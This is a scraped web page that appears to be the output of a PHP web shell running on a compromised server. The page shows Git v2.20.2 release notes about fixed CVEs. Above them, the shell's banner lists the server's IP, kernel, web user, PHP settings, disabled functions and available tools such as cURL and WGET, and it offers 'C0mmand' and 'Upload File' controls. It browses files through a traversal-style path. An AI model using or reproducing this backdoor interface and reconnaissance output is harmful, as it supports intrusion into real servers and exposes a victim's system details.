|
Server IP : 128.199.20.84 / Your IP : 172.70.100.147 Web Server : Apache/2.4.41 (Ubuntu) System : Linux competent-maruti 5.4.0-128-generic #144-Ubuntu SMP Tue Sep 20 11:00:04 UTC 2022 x86_64 User : www-data ( 33) PHP Version : 8.0.20 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /usr/src/../share/doc/python3-oauthlib/../python3-json-pointer/../perl/../git/RelNotes/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
Git v2.20.2 Release Notes ========================= This release merges up the fixes that appear in v2.14.6, v2.15.4 and in v2.17.3, addressing the security issues CVE-2019-1348, CVE-2019-1349, CVE-2019-1350, CVE-2019-1351, CVE-2019-1352, CVE-2019-1353, CVE-2019-1354, and CVE-2019-1387; see the release notes for those versions for details. The change to disallow `submodule.<name>.update=!command` entries in `.gitmodules` which was introduced v2.15.4 (and for which v2.17.3 added explicit fsck checks) fixes the vulnerability in v2.20.x where a recursive clone followed by a submodule update could execute code contained within the repository without the user explicitly having asked for that (CVE-2019-19604). Credit for finding this vulnerability goes to Joern Schneeweisz, credit for the fixes goes to Jonathan Nieder.